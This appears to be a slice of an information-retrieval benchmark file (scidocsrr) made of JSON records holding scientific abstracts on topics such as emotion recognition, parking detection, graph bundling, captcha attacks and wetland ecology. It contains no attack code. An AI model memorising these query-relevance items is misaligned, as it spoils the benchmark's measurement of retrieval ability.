"text": "Automatic emotion recognition is a challenging task which can make great impact on improving natural human computer interactions. In this paper, we present our effort for the Affect Subtask in the Audio/Visual Emotion Challenge (AVEC) 2017, which requires participants to perform continuous emotion prediction on three affective dimensions: Arousal, Valence and Likability based on the audiovisual signals. We highlight three aspects of our solutions: 1) we explore and fuse different hand-crafted and deep learned features from all available modalities including acoustic, visual, and textual modalities, and we further consider the interlocutor influence for the acoustic features; 2) we compare the effectiveness of non-temporal model SVR and temporal model LSTM-RNN and show that the LSTM-RNN can not only alleviate the feature engineering efforts such as construction of contextual features and feature delay, but also improve the recognition performance significantly; 3) we apply multi-task learning strategy for collaborative prediction of multiple emotion dimensions with shared representations according to the fact that different emotion dimensions are correlated with each other. Our solutions achieve the CCC of 0.675, 0.756 and 0.509 on arousal, valence, and likability respectively on the challenge testing set, which outperforms the baseline system with corresponding CCC of 0.375, 0.466, and 0.246 on arousal, valence, and likability.",
"title": ""
},
{
"docid": "a0f24500f3729b0a2b6e562114eb2a45",
"text": "In this work, the smallest reported inkjet-printed UWB antenna is proposed that utilizes a fractal matching network to increase the performance of a UWB microstrip monopole. The antenna is inkjet-printed on a paper substrate to demonstrate the ability to produce small and low-cost UWB antennas with inkjet-printing technology which can enable compact, low-cost, and environmentally friendly wireless sensor network.",
"title": ""
},
{
"docid": "25ca6416d95398eb0e79c1357dcf6554",
"text": "Bayesian Learning with Dependency Structures via Latent Factors, Mixtures, and Copulas by Shaobo Han Department of Electrical and Computer Engineering Duke University Date: Approved: Lawrence Carin, Supervisor",
"title": ""
},
{
"docid": "c983e94a5334353ec0e2dabb0e95d92a",
"text": "Digital family calendars have the potential to help families coordinate, yet they must be designed to easily fit within existing routines or they will simply not be used. To understand the critical factors affecting digital family calendar design, we extended LINC, an inkable family calendar to include ubiquitous access, and then conducted a month-long field study with four families. Adoption and use of LINC during the study demonstrated that LINC successfully supported the families' existing calendaring routines without disrupting existing successful social practices. Families also valued the additional features enabled by LINC. For example, several primary schedulers felt that ubiquitous access positively increased involvement by additional family members in the calendaring routine. The field trials also revealed some unexpected findings, including the importance of mobility---both within and outside the home---for the Tablet PC running LINC.",
"title": ""
},
{
"docid": "26b77bf67e242ff3e88a6f6bf7137d3e",
"text": "In the recent years there has been growing interest in exploiting multibaseline (MB) SAR interferometry in a tomographic framework, to produce full 3D imaging e.g. of forest layers. However, Fourier-based MB SAR tomography is generally affected by unsatisfactory imaging quality due to a typically low number of baselines and their irregular distribution. In this work, we apply the more modern adaptive Capon spectral estimator to the vertical image reconstruction problem, using real airborne MB data. A first demonstration of possible imaging enhancement in real-world conditions is given. Keywordssynthetic aperture radar interferometry, electromagnetic tomography, forestry, spectral analysis.",
"title": ""
},
{
"docid": "d3c491249b7df18b3ab993480d63e6d0",
"text": "There has been an increase in the number of colorimetric assay techniques for the determination of protein concentration over the past 20 years. This has resulted in a perceived increase in sensitivity and accuracy with the advent of new techniques. The present review considers these advances with emphasis on the potential use of such technologies in the assay of biopharmaceuticals. The techniques reviewed include Coomassie Blue G-250 dye binding (the Bradford assay), the Lowry assay, the bicinchoninic acid assay and the biuret assay. It is shown that each assay has advantages and disadvantages relative to sensitivity, ease of performance, acceptance in the literature, accuracy and reproducibility/coefficient of variation/laboratory-to-laboratory variation. A comparison of the use of several assays with the same sample population is presented. It is suggested that the most critical issue in the use of a chromogenic protein assay for the characterization of a biopharmaceutical is the selection of a standard for the calibration of the assay; it is crucial that the standard be representative of the sample. If it is not possible to match the standard with the sample from the perspective of protein composition, then it is preferable to use an assay that is not sensitive to the composition of the protein such as a micro-Kjeldahl technique, quantitative amino acid analysis or the biuret assay. In a complex mixture it might be inappropriate to focus on a general method of protein determination and much more informative to use specific methods relating to the protein(s) of particular interest, using either specific assays or antibody-based methods. The key point is that whatever method is adopted as the 'gold standard' for a given protein, this method needs to be used routinely for calibration.",
"title": ""
},
{
"docid": "a981db3aa149caec10b1824c82840782",
"text": "It has been suggested that the performance of a team is determined by the team members’ roles. An analysis of the performance of 342 individuals organised into 33 teams indicates that team roles characterised by creativity, co-ordination and cooperation are positively correlated with team performance. Members of developed teams exhibit certain performance enhancing characteristics and behaviours. Amongst the more developed teams there is a positive relationship between Specialist Role characteristics and team performance. While the characteristics associated with the Coordinator Role are also positively correlated with performance, these can impede the performance of less developed teams.",
"title": ""
},
{
"docid": "a0501b0b3ba110692f9b162ce5f72c05",
"text": "RDF and related Semantic Web technologies have been the recent focus of much research activity. This work has led to new specifications for RDF and OWL. However, efficient implementations of these standards are needed to realize the vision of a world-wide semantic Web. In particular, implementations that scale to large, enterprise-class data sets are required. Jena2 is the second generation of Jena, a leading semantic web programmers’ toolkit. This paper describes the persistence subsystem of Jena2 which is intended to support large datasets. This paper describes its features, the changes from Jena1, relevant details of the implementation and performance tuning issues. Query optimization for RDF is identified as a promising area for future research.",
"title": ""
},
{
"docid": "e35cc74485629dd33995cb7567c3052b",
"text": "One of the fundamental objectives of Computer Science is to reduce the menial, repetitive and mundane tasks. It might be arithmetic calculations or maintaining huge amount of data. With the advent of Artificial Intelligence and Machine Learning, we are a step ahead. We not only make the machine perform these tasks but also those which would require the intelligence and the reasoning of a human brain. This involves decision making, interpretation and prediction. The project makes an attempt to minimize human intervention in a wide range of domains. The tool that is built is capable of having human-like conversations with a person. Currently, the conversational model built is capable of having casual conversations in a variety of topics which involve no domain specific knowledge. The same can be replicated in a domain specific environment by including the previous conversations or data of that specific domain. The concepts of Machine Learning and Artificial Intelligence i.e., Recurrent Neural Networks along with LSTMs (Long Short Term Memory) are used to train the neural network. Keywords—Recurrent Neural Networks, Chatbot, Machine Consciousness.",
"title": ""
},
{
"docid": "c14fdd0f98260fe5947cfddc72a95a92",
"text": "Low-power sensing technologies have emerged for acquiring physiologically indicative patient signals. However, to enable devices with high clinical value, a critical requirement is the ability to analyze the signals to extract specific medical information. Yet given the complexities of the underlying processes, signal analysis poses numerous challenges. Data-driven methods based on machine learning offer distinct solutions, but unfortunately the computations are not well supported by traditional DSP. This paper presents a custom processor that integrates a CPU with configurable accelerators for discriminative machine-learning functions. A support-vector-machine accelerator realizes various classification algorithms as well as various kernel functions and kernel formulations, enabling range of points within an accuracy-versus-energy and -memory trade space. An accelerator for embedded active learning enables prospective adaptation of the signal models by utilizing sensed data for patient-specific customization, while minimizing the effort from human experts. The prototype is implemented in 130-nm CMOS and operates from 1.2 V-0.55 V (0.7 V for SRAMs). Medical applications for EEG-based seizure detection and ECG-based cardiac-arrhythmia detection are demonstrated using clinical data, while consuming 273 μJ and 124 μJ per detection, respectively; this represents 62.4× and 144.7× energy reduction compared to an implementation based on the CPU. A patient-adaptive cardiac-arrhythmia detector is also demonstrated, reducing the analysis-effort required for model customization by 20 ×.",
"title": ""
}
] | scidocsrr |
a764fa620d332512e53b59058336f383 | Vacant Parking Space Detection in Static | [
{
"docid": "13d94a3afd97c4c5f8839652c58ab05f",
"text": "We present an approach for learning to detect objects in still gray images, that is based on a sparse, part-based representation of objects. A vocabulary of information-rich object parts is automatically constructed from a set of sample images of the object class of interest. Images are then represented using parts from this vocabulary, along with spatial relations observed among them. Based on this representation, a feature-efficient learning algorithm is used to learn to detect instances of the object class. The framework developed can be applied to any object with distinguishable parts in a relatively fixed spatial configuration. We report experiments on images of side views of cars. Our experiments show that the method achieves high detection accuracy on a difficult test set of real-world images, and is highly robust to partial occlusion and background variation. In addition, we discuss and offer solutions to several methodological issues that are significant for the research community to be able to evaluate object detection",
"title": ""
},
{
"docid": "14520419a4b0e27df94edc4cf23cde65",
"text": "In this paper we propose and examine non–parametric statistical tests to define similarity and homogeneity measure s for textures. The statistical tests are applied to the coeffi cients of images filtered by a multi–scale Gabor filter bank. We will demonstrate that these similarity measures are useful for both, texture based image retrieval and for unsupervised texture segmentation, and hence offer an unified approach to these closely related tasks. We present results on Brodatz–like micro–textures and a collection of real–word images.",
"title": ""
}
] | [
{
"docid": "7247eb6b90d23e2421c0d2500359d247",
"text": "The large-scale collection and exploitation of personal information to drive targeted online advertisements has raised privacy concerns. As a step towards understanding these concerns, we study the relationship between how much information is collected and how valuable it is for advertising. We use HTTP traces consisting of millions of users to aid our study and also present the first comparative study between aggregators. We develop a simple model that captures the various parameters of today's advertising revenues, whose values are estimated via the traces. Our results show that per aggregator revenue is skewed (5% accounting for 90% of revenues), while the contribution of users to advertising revenue is much less skewed (20% accounting for 80% of revenue). Google is dominant in terms of revenue and reach (presence on 80% of publishers). We also show that if all 5% of the top users in terms of revenue were to install privacy protection, with no corresponding reaction from the publishers, then the revenue can drop by 30%.",
"title": ""
},
{
"docid": "59445fae343192fb6a95b57e0801dd0b",
"text": "Online anomaly detection is an important step in data center management, requiring light-weight techniques that provide sufficient accuracy for subsequent diagnosis and management actions. This paper presents statistical techniques based on the Tukey and Relative Entropy statistics, and applies them to data collected from a production environment and to data captured from a testbed for multi-tier web applications running on server class machines. The proposed techniques are lightweight and improve over standard Gaussian assumptions in terms of performance.",
"title": ""
},
{
"docid": "a2cbc2b95b1988dae97d501c141e161d",
"text": "We present a fast and simple method to compute bundled layouts of general graphs. For this, we first transform a given graph drawing into a density map using kernel density estimation. Next, we apply an image sharpening technique which progressively merges local height maxima by moving the convolved graph edges into the height gradient flow. Our technique can be easily and efficiently implemented using standard graphics acceleration techniques and produces graph bundlings of similar appearance and quality to state-of-the-art methods at a fraction of the cost. Additionally, we show how to create bundled layouts constrained by obstacles and use shading to convey information on the bundling quality. We demonstrate our method on several large graphs.",
"title": ""
},
{
"docid": "ecce348941aeda57bd66dbd7836923e6",
"text": "Moana (2016) continues a tradition of Disney princess movies that perpetuate gender stereotypes. The movie contains the usual Electral undercurrent, with Moana seeking to prove her independence to her overprotective father. Moana’s partner in her adventures, Maui, is overtly hypermasculine, a trait epitomized by a phallic fishhook that is critical to his identity. Maui’s struggles with shapeshifting also reflect male anxieties about performing masculinity. Maui violates the Mother Island, first by entering her cave and then by using his fishhook to rob her of her fertility. The repercussions of this act are the basis of the plot: the Mother Island abandons her form as a nurturing, youthful female (Te Fiti) focused on creation to become a vengeful lava monster (Te Kā). At the end, Moana successfully urges Te Kā to get in touch with her true self, a brave but simple act that is sufficient to bring back Te Fiti, a passive, smiling green goddess. The association of youthful, fertile females with good and witch-like infertile females with evil implies that women’s worth and well-being are dependent upon their procreative function. Stereotypical gender tropes that also include female abuse of power and a narrow conception of masculinity merit analysis in order to further progress in recognizing and addressing patterns of gender hegemony in popular Disney films.",
"title": ""
},
{
"docid": "44b44e400b44f3f83b698f9492e5c8b7",
"text": "Word vector representation techniques, built on word-word co-occurrence statistics, often provide representations that decode the differences in meaning between various words. This significant fact is a powerful tool that can be exploited to a great deal of natural language processing tasks. In this work, we propose a simple and efficient unsupervised approach for keyphrase extraction, called Reference Vector Algorithm (RVA) which utilizes a local word vector representation by applying the GloVe method in the context of one scientific publication at a time. Then, the mean word vector (reference vector) of the article’s abstract guides the candidate keywords’ selection process, using the cosine similarity. The experimental results that emerged through a thorough evaluation process show that our method outperforms the state-of-the-art methods by providing high quality keyphrases in most cases, proposing in this way an additional mode for the exploitation of GloVe word vectors.",
"title": ""
},
{
"docid": "23d85b55654147eeac8c25ded8a87ccb",
"text": "This paper gives the design of Yagi-Uda antenna using microstrip circuit. Microstip circuits are used to implement Yagi-Uda antenna so as to reduce the size but here we have shown only two optimization technique. This has been done by varying the length, width and spacing between reflector, driven element and directors. Simulations are conducted to show how return loss and other parameters vary by varying the above mentioned Yagi-Uda parameters. This antenna is operating very near to resonant frequency fr = 2. 4 GHz with the specification relative permittivity ?r= 3. 2, height of substrate h=1. 6mm, characteristic impedance Z0 = 50 ohm and thickness of strip conductor t=35um. In this paper, two most approximate results after all these perturbations are analyzed and simulations showing return loss and other parameters like directivity, gain and power radiated are discussed. The simulation process has been done using Advanced Design System (ADS) tool.",
"title": ""
},
{
"docid": "1e57a3da54c0d37bc47134961feaf981",
"text": "Software Development Life Cycle (SDLC) is a process consisting of various phases like requirements analysis, designing, coding, testing and implementation & maintenance of a software system as well as the way, in which these phases are implemented. Research studies reveal that the initial two phases, viz. requirements and design are the skeleton of the entire development life cycle. Designing has several sub-activities such as Architectural, Function-Oriented and Object- Oriented design, which aim to transform the requirements into detailed specifications covering all facets of the system in a proper way, but at the same time, there exists various related challenges too. One of the foremost challenges is the minimum interaction between construction and design teams causing numerous problems during design such as: production delays, incomplete designs, rework, change orders, etc. Prior research studies reveal that Artificial Intelligence (AI) techniques may eliminate these problems by offering several tools/techniques to automate certain processes up to a certain extent. In this paper, our major aim is to identify the challenges in each of the stages of the design phase and possibility of AI techniques to overcome these identified issues. In addition, the paper also explores the relationship between these issues and their possible AI solution/s through Venn-Diagram. For some of the issues, there exist more than one AI techniques but for some issues, no AI technique/s have been found to overcome the same and accordingly, those issues are still open for further research.",
"title": ""
},
{
"docid": "be86e9eb8227340213627f1fb1012f52",
"text": "Animal studies have shown that a periodontal ligament may be produced around a titanium implant when it is in contact with fractured and retained roots. Formation of cementum and attachment connective tissue around titanium implants confirms that cementum progenitor cells are located in the periodontal ligament, since cementum and periodontal ligament are present at the implant-root interface, whereas the remainder of the implant, which is not in contact with the root, shows osseointegration. The aim was to evaluate histologically the characteristics of the tissue present between a titanium implant and a retained root, which were subsequently extracted as a result of peri-implantitis. The histologic examination revealed a continuous layer of cementum and numerous cementocytes on the implant surface. No blood vessel or collagen fibers were detected in the periodontal space. In contrast to experimental studies carried out on animals, the lack of connective tissue fibers and the presence of hypercementosis in this specimen could have been caused by the inflammatory process. Furthermore, the extrusive movement of the root might explain the presence of cementum hypertrophy. Further studies are required to establish whether the neoformation of cementum and collagen fibers on an implant in the presence of root residues occurs only in animal models or whether it may also occur in humans.",
"title": ""
},
{
"docid": "c7daf28d656a9e51e5a738e70beeadcf",
"text": "We present a taxonomy for Information Visualization (IV) that characterizes it in terms of data, task, skill and context, as well as a number of dimensions that relate to the input and output hardware, the software tools, as well as user interactions and human perceptual abil ities. We il lustrate the utilit y of the taxonomy by focusing particularly on the information retrieval task and the importance of taking into account human perceptual capabiliti es and limitations. Although the relevance of Psychology to IV is often recognised, we have seen relatively littl e translation of psychological results and theory to practical IV applications. This paper targets the better development of information visualizations through the introduction of a framework delineating the major factors in interface development. We believe that higher quality visualizations will result from structured developments that take into account these considerations and that the framework will also serve to assist the development of effective evaluation and assessment processes.",
"title": ""
},
{
"docid": "ae607090eaca242af95227d8788d1a49",
"text": "As systems become more service oriented and processes increasingly cross organizational boundaries, interaction becomes more important. New technologies support the development of such systems. However, the paradigm shift towards service orientation, requires a fundamentally different way of looking at processes. This survey aims to provide some foundational notions related to service interaction. A set of service interaction patterns is given to illustrate the challenges in this domain. Moreover, key results are given for three of these challenges: (1) How to expose a service?, (2) How to replace and refine services?, and (3) How to generate service adapters? These challenges will be addressed in a Petri net setting. However, the results extend to other languages used in this domain.",
"title": ""
},
{
"docid": "cf0b692c3084713b3d3a98e4954d994f",
"text": "Genome instability, defined as higher than normal rates of mutation, is a double-edged sword. As a source of genetic diversity and natural selection, mutations are beneficial for evolution. On the other hand, genomic instability can have catastrophic consequences for age-related diseases such as cancer. Mutations arise either from inactivation of DNA repair pathways or in a repair-competent background due to genotoxic stress from celluar processes such as transcription and replication that overwhelm high-fidelity DNA repair. Here, we review recent studies that shed light on endogenous sources of mutation and epigenomic features that promote genomic instability during cancer evolution.",
"title": ""
},
{
"docid": "eb91cfce08dd5e17599c18e3b291db3e",
"text": "The extraordinary electronic properties of graphene provided the main thrusts for the rapid advance of graphene electronics. In photonics, the gate-controllable electronic properties of graphene provide a route to efficiently manipulate the interaction of photons with graphene, which has recently sparked keen interest in graphene plasmonics. However, the electro-optic tuning capability of unpatterned graphene alone is still not strong enough for practical optoelectronic applications owing to its non-resonant Drude-like behaviour. Here, we demonstrate that substantial gate-induced persistent switching and linear modulation of terahertz waves can be achieved in a two-dimensional metamaterial, into which an atomically thin, gated two-dimensional graphene layer is integrated. The gate-controllable light-matter interaction in the graphene layer can be greatly enhanced by the strong resonances of the metamaterial. Although the thickness of the embedded single-layer graphene is more than six orders of magnitude smaller than the wavelength (<λ/1,000,000), the one-atom-thick layer, in conjunction with the metamaterial, can modulate both the amplitude of the transmitted wave by up to 47% and its phase by 32.2° at room temperature. More interestingly, the gate-controlled active graphene metamaterials show hysteretic behaviour in the transmission of terahertz waves, which is indicative of persistent photonic memory effects.",
"title": ""
},
{
"docid": "c89de16110a66d65f8ae7e3476fe90ef",
"text": "In this paper, a new notion which we call private data deduplication protocol, a deduplication technique for private data storage is introduced and formalized. Intuitively, a private data deduplication protocol allows a client who holds a private data proves to a server who holds a summary string of the data that he/she is the owner of that data without revealing further information to the server. Our notion can be viewed as a complement of the state-of-the-art public data deduplication protocols of Halevi et al [7]. The security of private data deduplication protocols is formalized in the simulation-based framework in the context of two-party computations. A construction of private deduplication protocols based on the standard cryptographic assumptions is then presented and analyzed. We show that the proposed private data deduplication protocol is provably secure assuming that the underlying hash function is collision-resilient, the discrete logarithm is hard and the erasure coding algorithm can erasure up to α-fraction of the bits in the presence of malicious adversaries in the presence of malicious adversaries. To the best our knowledge this is the first deduplication protocol for private data storage.",
"title": ""
},
{
"docid": "6c3c88705b06657ae1ac4c9ff37e5263",
"text": "The Generative Adversarial Networks (GANs) have demonstrated impressive performance for data synthesis, and are now used in a wide range of computer vision tasks. In spite of this success, they gained a reputation for being difficult to train, what results in a time-consuming and human-involved development process to use them. We consider an alternative training process, named SGAN, in which several adversarial \"local\" pairs of networks are trained independently so that a \"global\" supervising pair of networks can be trained against them. The goal is to train the global pair with the corresponding ensemble opponent for improved performances in terms of mode coverage. This approach aims at increasing the chances that learning will not stop for the global pair, preventing both to be trapped in an unsatisfactory local minimum, or to face oscillations often observed in practice. To guarantee the latter, the global pair never affects the local ones. The rules of SGAN training are thus as follows: the global generator and discriminator are trained using the local discriminators and generators, respectively, whereas the local networks are trained with their fixed local opponent. Experimental results on both toy and real-world problems demonstrate that this approach outperforms standard training in terms of better mitigating mode collapse, stability while converging and that it surprisingly, increases the convergence speed as well.",
"title": ""
},
{
"docid": "331c9dfa628f2bd045b6e0ad643a4d33",
"text": "What is most evident in the recent debate concerning new wetland regulations drafted by the U.S. Army Corps of Engineers is that small, isolated wetlands will likely continue to be lost. The critical biological question is whether small wetlands are expendable, and the fundamental issue is the lack of biologically relevant data on the value of wetlands, especially so-called “isolated” wetlands of small size. We used data from a geographic information system for natural-depression wetlands on the southeastern Atlantic coastal plain (U.S.A.) to examine the frequency distribution of wetland sizes and their nearest-wetland distances. Our results indicate that the majority of natural wetlands are small and that these small wetlands are rich in amphibian species and serve as an important source of juvenile recruits. Analyses simulating the loss of small wetlands indicate a large increase in the nearest-wetland distance that could impede “rescue” effects at the metapopulation level. We argue that small wetlands are extremely valuable for maintaining biodiversity, that the loss of small wetlands will cause a direct reduction in the connectance among remaining species populations, and that both existing and recently proposed legislation are inadequate for maintaining the biodiversity of wetland flora and fauna. Small wetlands are not expendable if our goal is to maintain present levels of species biodiversity. At the very least, based on these data, regulations should protect wetlands as small as 0.2 ha until additional data are available to compare diversity directly across a range of wetland sizes. Furthermore, we strongly advocate that wetland legislation focus not only on size but also on local and regional wetland distribution in order to protect ecological connectance and the source-sink dynamics of species populations. Son los Humedales Pequeños Prescindibles? Resumen: Algo muy evidente en el reciente debate sobre las nuevas regulaciones de humedales elaboradas por el cuerpo de ingenieros de la armada de los Estados Unidos es que los humedales aislados pequeños seguramente se continuarán perdiendo. La pregunta biológica crítica es si los humedales pequeños son prescindibles y e asunto fundamental es la falta de datos biológicos relevantes sobre el valor de los humedales, especialmente los llamados humedales “aislados” de tamaño pequeño. Utilizamos datos de GIS para humedales de depresiones naturales en la planicie del sureste de la costa Atlántica (U.S.A.) para examinar la distribución de frecuencias de los tamaños de humedales y las distancias a los humedales mas cercanos. Nuestros resultados indican que la mayoría de los humedales naturales son pequeños y que estos humedales pequeños son ricos en especies de anfibios y sirven como una fuente importante de reclutas juveniles. Análisis simulando la pérdida de humedales pequeños indican un gran incremento en la distancia al humedal mas cercano lo cual impediría efectos de “rescate” a nivel de metapoblación. Argumentamos que los humedales pequeños son extremadamente valiosos para el mantenimiento de la biodiversidad, que la pérdida de humedales pequeños causará una reducción directa en la conexión entre poblaciones de especies remanentes y que tanto la legislación propuesta como la existente son inadecuadas para mantener la biodiversidad de la flora y fauna de los humedales. Si nuestra meta es mantener los niveles actuales de biodiversidad de especies, los humedales pequeños no son prescindibles. En base en estos datos, las regulaciones deberían por lo menos proteger humedales tan pequeños como 0.2 ha hasta que se tengan a la mano datos adicionales para comPaper submitted April 1, 1998; revised manuscript accepted June 24, 1998. 1130 Expendability of Small Wetlands Semlitsch & Bodie Conservation Biology Volume 12, No. 5, October 1998 parar directamente la diversidad a lo largo de un rango de humedales de diferentes tamaños. Mas aún, abogamos fuertemente por que la regulación de los pantanos se enfoque no solo en el tamaño, sino también en la distribución local y regional de los humedales para poder proteger la conexión ecológica y las dinámicas fuente y sumidero de poblaciones de especies.",
"title": ""
},
{
"docid": "46ef5b489f02a1b62b0fb78a28bfc32c",
"text": "Biobanks have been heralded as essential tools for translating biomedical research into practice, driving precision medicine to improve pathways for global healthcare treatment and services. Many nations have established specific governance systems to facilitate research and to address the complex ethical, legal and social challenges that they present, but this has not lead to uniformity across the world. Despite significant progress in responding to the ethical, legal and social implications of biobanking, operational, sustainability and funding challenges continue to emerge. No coherent strategy has yet been identified for addressing them. This has brought into question the overall viability and usefulness of biobanks in light of the significant resources required to keep them running. This review sets out the challenges that the biobanking community has had to overcome since their inception in the early 2000s. The first section provides a brief outline of the diversity in biobank and regulatory architecture in seven countries: Australia, Germany, Japan, Singapore, Taiwan, the UK, and the USA. The article then discusses four waves of responses to biobanking challenges. This article had its genesis in a discussion on biobanks during the Centre for Health, Law and Emerging Technologies (HeLEX) conference in Oxford UK, co-sponsored by the Centre for Law and Genetics (University of Tasmania). This article aims to provide a review of the issues associated with biobank practices and governance, with a view to informing the future course of both large-scale and smaller scale biobanks.",
"title": ""
},
{
"docid": "9faf67646394dfedfef1b6e9152d9cf6",
"text": "Acoustic shooter localization systems are being rapidly deployed in the field. However, these are standalone systems---either wearable or vehicle-mounted---that do not have networking capability even though the advantages of widely distributed sensing for locating shooters have been demonstrated before. The reason for this is that certain disadvantages of wireless network-based prototypes made them impractical for the military. The system that utilized stationary single-channel sensors required many sensor nodes, while the multi-channel wearable version needed to track the absolute self-orientation of the nodes continuously, a notoriously hard task. This paper presents an approach that overcomes the shortcomings of past approaches. Specifically, the technique requires as few as five single-channel wireless sensors to provide accurate shooter localization and projectile trajectory estimation. Caliber estimation and weapon classification are also supported. In addition, a single node alone can provide reliable miss distance and range estimates based on a single shot as long as a reasonable assumption holds. The main contribution of the work and the focus of this paper is the novel sensor fusion technique that works well with a limited number of observations. The technique is thoroughly evaluated using an extensive shot library.",
"title": ""
},
{
"docid": "afcde1fb33c3e36f35890db09c548a1f",
"text": "Since their inception, captchas have been widely used for preventing fraudsters from performing illicit actions. Nevertheless, economic incentives have resulted in an arms race, where fraudsters develop automated solvers and, in turn, captcha services tweak their design to break the solvers. Recent work, however, presented a generic attack that can be applied to any text-based captcha scheme. Fittingly, Google recently unveiled the latest version of reCaptcha. The goal of their new system is twofold; to minimize the effort for legitimate users, while requiring tasks that are more challenging to computers than text recognition. ReCaptcha is driven by an “advanced risk analysis system” that evaluates requests and selects the difficulty of the captcha that will be returned. Users may be required to click in a checkbox, or solve a challenge by identifying images with similar content. In this paper, we conduct a comprehensive study of reCaptcha, and explore how the risk analysis process is influenced by each aspect of the request. Through extensive experimentation, we identify flaws that allow adversaries to effortlessly influence the risk analysis, bypass restrictions, and deploy large-scale attacks. Subsequently, we design a novel low-cost attack that leverages deep learning technologies for the semantic annotation of images. Our system is extremely effective, automatically solving 70.78% of the image reCaptcha challenges, while requiring only 19 seconds per challenge. We also apply our attack to the Facebook image captcha and achieve an accuracy of 83.5%. Based on our experimental findings, we propose a series of safeguards and modifications for impacting the scalability and accuracy of our attacks. Overall, while our study focuses on reCaptcha, our findings have wide implications; as the semantic information conveyed via images is increasingly within the realm of automated reasoning, the future of captchas relies on the exploration of novel directions.",
"title": ""
},
{
"docid": "d8982dd146a28c7d2779c781f7110ed5",
"text": "We consider the budget optimization problem faced by an advertiser participating in repeated sponsored search auctions, seeking to maximize the number of clicks attained under that budget. We cast the budget optimization problem as a Markov Decision Process (MDP) with censored observations, and propose a learning algorithm based on the wellknown Kaplan-Meier or product-limit estimator. We validate the performance of this algorithm by comparing it to several others on a large set of search auction data from Microsoft adCenter, demonstrating fast convergence to optimal performance.",
"title": ""
},
{
"docid": "caed1f75d310571b386b9ff2590e8662",
"text": "This video presents a humanoid two-arm system developed as a research platform for studying dexterous two-handed manipulation. The system is based on the modular DLR-Lightweight-Robot-III and the DLR-Hand-II. Two arms and hands are combined with a three degrees-of-freedom movable torso and a visual system to form a complete humanoid upper body. The diversity of the system is demonstrated by showing the mechanical design, several control concepts, the application of rapid prototyping and hardware-in-the-loop (HIL) development as well as two-handed manipulation experiments and the integration of path planning capabilities.",
"title": ""
}
] | scidocsrr |
620992cde18533a7c5166dff0f0c5393 | ASCII Art Synthesis from Natural Photographs | [
{
"docid": "457e2f2583a94bf8b6f7cecbd08d7b34",
"text": "We present a fast structure-based ASCII art generation method that accepts arbitrary images (real photograph or hand-drawing) as input. Our method supports not only fixed width fonts, but also the visually more pleasant and computationally more challenging proportional fonts, which allows us to represent challenging images with a variety of structures by characters. We take human perception into account and develop a novel feature extraction scheme based on a multi-orientation phase congruency model. Different from most existing contour detection methods, our scheme does not attempt to remove textures as much as possible. Instead, it aims at faithfully capturing visually sensitive features, including both main contours and textural structures, while suppressing visually insensitive features, such as minor texture elements and noise. Together with a deformation-tolerant image similarity metric, we can generate lively and meaningful ASCII art, even when the choices of character shapes and placement are very limited. A dynamic programming based optimization is proposed to simultaneously determine the optimal proportional-font characters for matching and their optimal placement. Experimental results show that our results outperform state-of-the-art methods in term of visual quality.",
"title": ""
}
] | [
{
"docid": "c6baff0d600c76fac0be9a71b4238990",
"text": "Nature has provided rich models for computational problem solving, including optimizations based on the swarm intelligence exhibited by fireflies, bats, and ants. These models can stimulate computer scientists to think nontraditionally in creating tools to address application design challenges.",
"title": ""
},
{
"docid": "d42f5fdbcaf8933dc97b377a801ef3e0",
"text": "Bodyweight supported treadmill training has become a prominent gait rehabilitation method in leading rehabilitation centers. This type of locomotor training has many functional benefits but the labor costs are considerable. To reduce therapist effort, several groups have developed large robotic devices for assisting treadmill stepping. A complementary approach that has not been adequately explored is to use powered lower limb orthoses for locomotor training. Recent advances in robotic technology have made lightweight powered orthoses feasible and practical. An advantage to using powered orthoses as rehabilitation aids is they allow practice starting, turning, stopping, and avoiding obstacles during overground walking.",
"title": ""
},
{
"docid": "a21d1956026b29bc67b92f8508a62e1c",
"text": "We introduce several new formulations for sparse nonnegative matrix approximation. Subsequently, we solve these formulations by developing generic algorithms. Further, to help selecting a particular sparse formulation, we briefly discuss the interpretation of each formulation. Finally, preliminary experiments are presented to illustrate the behavior of our formulations and algorithms.",
"title": ""
},
{
"docid": "fbd95124640b54a594f29871df4d5a5c",
"text": "Gradable adjectives denote a function that takes an object and returns a measure of the degree to which the object possesses some gradable property [Kennedy, C. (1999). Projecting the adjective: The syntax and semantics of gradability and comparison. New York: Garland]. Scales, ordered sets of degrees, have begun to be studied systematically in semantics [Kennedy, C. (to appear). Vagueness and grammar: the semantics of relative and absolute gradable predicates. Linguistics and Philosophy; Kennedy, C. and McNally, L. (2005). Scale structure, degree modification, and the semantics of gradable predicates. Language, 81, 345-381; Rotstein, C., and Winter, Y. (2004). Total adjectives vs. partial adjectives: scale structure and higher order modifiers. Natural Language Semantics, 12, 259-288.]. We report four experiments designed to investigate the processing of absolute adjectives with a maximum standard (e.g., clean) and their minimum standard antonyms (dirty). The central hypothesis is that the denotation of an absolute adjective introduces a 'standard value' on a scale as part of the normal comprehension of a sentence containing the adjective (the \"Obligatory Scale\" hypothesis). In line with the predictions of Kennedy and McNally (2005) and Rotstein and Winter (2004), maximum standard adjectives and minimum standard adjectives systematically differ from each other when they are combined with minimizing modifiers like slightly, as indicated by speeded acceptability judgments. An eye movement recording study shows that, as predicted by the Obligatory Scale hypothesis, the penalty due to combining slightly with a maximum standard adjective can be observed during the processing of the sentence; the penalty is not the result of some after-the-fact inferencing mechanism. Further, a type of 'quantificational variability effect' may be observed when a quantificational adverb (mostly) is combined with a minimum standard adjective in sentences like \"The dishes are mostly dirty\", which may receive either a degree interpretation (e.g., 80% dirty) or a quantity interpretation (e.g., 80% of the dishes are dirty). The quantificational variability results provide suggestive support for the Obligatory Scale hypothesis by showing that the standard of a scalar adjective influences the preferred interpretation of other constituents in the sentence.",
"title": ""
},
{
"docid": "7bdbed53cc467b43eb2653c3a4818a0c",
"text": "Alternative splicing of pre-mRNAs is a major contributor to both proteomic diversity and control of gene expression levels. Splicing is tightly regulated in different tissues and developmental stages, and its disruption can lead to a wide range of human diseases. An important long-term goal in the splicing field is to determine a set of rules or \"code\" for splicing that will enable prediction of the splicing pattern of any primary transcript from its sequence. Outside of the core splice site motifs, the bulk of the information required for splicing is thought to be contained in exonic and intronic cis-regulatory elements that function by recruitment of sequence-specific RNA-binding protein factors that either activate or repress the use of adjacent splice sites. Here, we summarize the current state of knowledge of splicing cis-regulatory elements and their context-dependent effects on splicing, emphasizing recent global/genome-wide studies and open questions.",
"title": ""
},
{
"docid": "d964e7b98a139b1bb936ff94d1100934",
